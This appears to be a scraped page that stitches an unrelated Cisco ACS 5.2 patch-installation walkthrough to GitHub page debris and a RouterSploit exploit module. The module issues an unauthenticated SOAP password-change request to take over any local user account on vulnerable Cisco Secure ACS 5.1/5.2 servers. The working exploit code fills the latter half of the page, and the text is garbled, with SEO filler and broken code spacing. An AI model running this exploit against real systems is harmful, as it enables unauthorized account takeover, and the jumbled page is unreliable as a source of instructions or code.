Cisco Acs 5.2 Patch Installation

Posted on
Cisco Acs 5.2 Patch Installation 3,6/5 9187 votes
  1. Cisco Acs 5.2 Patch Install 5.4
  2. Cisco Secure Acs For Windows
  3. Cisco Acs 5.2 Patch Install 5.5
5.2Patch

I had to patch my ACS 5.2 server couple of times & thought of describing the process here. First of all you need to download the correct patch from Cisco web site. You can find that via Products->Security->Access Control and Policy->Policy and Access Management->Cisco Secure Access Control Systemor via this direct link. You should have valid CCO account & ACS product purchased from Cisco with valid contract.

Jun 25, 2018  I am trying to apply patch 5.2.0.26.10 to a newly installed Cisco Secure ACS Server. When I run the acs patch install command it fails. Here is my repos config: repository Update url s ftp://10.134.52.115/ user id4sftp password removed sh repo. Step 3 Install the ACS 5.2 cumulative patch by running the following acs patch command in the EXEC mode to install the ACS patch: acs patch install patch-name.tar.gpg repository repository-name ACS displays.

Cisco Acs 5.2 Patch Install 5.4

In my case I have downloaded latest patch “5-2-0-26-11.tar.gpg” for my ACS 5.2 server. You need to create a software repository on your ACS before copying this file onto it. You can do this via “System Administration > Operations > Software Repositories”. Here is the screenshot of my software repository created for this.

You can choose multiple protocols, but I selected FTP after doing quick search on web. Lots of users reporting TFTP did not work properly, etc. Here is the complete list of values you can choose from.

I used free FTP server (called FileZilla) installed on my laptop, while creating username password for ACS to talk to it. Then you can install the patch into ACS server by issuing “acs patch install <filename> repository <repository-name> ” CLI command. Here is the screenshot of my file transfer.

You can verify the progress on ACS CLI as well. You should see something similar to this.

Once patch installed you can verify the application status by “show application status acs” & “show version” CLI commands. Below screenshot confirmed application is running correctly.

If you are using GUI you can confirm the same by clicking “About” button on the ACS admin page

.

Permalink

Join GitHub today

GitHub is home to over 36 million developers working together to host and review code, manage projects, and build software together.

Sign up

Cisco Secure Acs For Windows

Branch:master
Find file Copy path

Cisco Acs 5.2 Patch Install 5.5

Cannot retrieve contributors at this time
from routersploit.core.exploit import*
from routersploit.core.http.http_client import HTTPClient
classExploit(HTTPClient):
__info__ = {
'name': 'Cisco Secure ACS Unauthorized Password Change',
'description': 'Module exploits an authentication bypass issue which allows arbitrary '
'password change requests to be issued for any user in the local store. '
'Instances of Secure ACS running version 5.1 with patches 3, 4, or 5 as well '
'as version 5.2 with either no patches or patches 1 and 2 are vulnerable.',
'authors': (
'Jason Kratzer <pyoor[at]flinkd.org>', # vulnerability discovery & metasploit module
'Marcin Bury <marcin[at]threat9.com>', # routersploit module
),
'references': (
'http://www.cisco.com/en/US/products/csa/cisco-sa-20110330-acs.html',
),
'devices': (
'Cisco Secure ACS version 5.1 with patch 3, 4, or 5 installed and without patch 6 or later installed',
'Cisco Secure ACS version 5.2 without any patches installed',
'Cisco Secure ACS version 5.2 with patch 1 or 2 installed and without patch 3 or later installed',
),
}
target = OptIP('', 'Target IPv4 or IPv6 address')
port = OptPort(443, 'Target HTTP port')
ssl = OptBool(True, 'SSL enabled: true/false')
path = OptString('/PI/services/UCP/', 'Path to UCP WebService')
username = OptString('', 'Username to use')
password = OptString('', 'Password to use')
defrun(self):
headers = {'SOAPAction': ''changeUserPass''}
data = ('<?xml version='1.0' encoding='utf-8'?>'+'rn'
'<SOAP-ENV:Envelope SOAP-ENV:encodingStyle='http://schemas.xmlsoap.org/soap/encoding/' '
'xmlns:SOAP-ENC='http://schemas.xmlsoap.org/soap/encoding/' '
'xmlns:xsi='http://www.w3.org/1999/XMLSchema-instance' xmlns:SOAP-ENV='http://schemas.xmlsoap.org/soap/envelope/' '
'xmlns:xsd='http://www.w3.org/1999/XMLSchema'>'+'rn'
'<SOAP-ENV:Body>'+'rn'
'<ns1:changeUserPass xmlns:ns1='UCP' SOAP-ENC:root='1'>'+'rn'
'<v1 xsi:type='xsd:string'>'+self.username +'</v1>'+'rn'
'<v2 xsi:type='xsd:string'>fakepassword</v2>'+'rn'
'<v3 xsi:type='xsd:string'>'+self.password +'</v3>'+'rn'
'</ns1:changeUserPass>'
'</SOAP-ENV:Body>'+'rn'
'</SOAP-ENV:Envelope>'+'rnrn')
print_status('Issuing password change request for: '+self.username)
response =self.http_request(
method='POST',
path=self.path,
data=data,
headers=headers
)
if response isNone:
print_error('Exploit failed. Target seems to be not vulnerable.')
return
if'success'in response.text:
print_success('Success! Password for {} has been changed to {}'.format(self.username, self.password))
elif'Password has already been used'in response.text:
print_error('Failed! The supplied password has already been used.')
print_error('Please change the password and try again.')
elif'Invalid credentials for user'in response.text:
print_error('Failed! Username does not exist or target is not vulnerable.')
print_error('Please change the username and try again.')
else:
print_error('Failed! An unknown error has occurred.')
@mute
defcheck(self):
# it is not possible to verify if target is vulnerable without exploiting system
returnNone
  • Copy lines
  • Copy permalink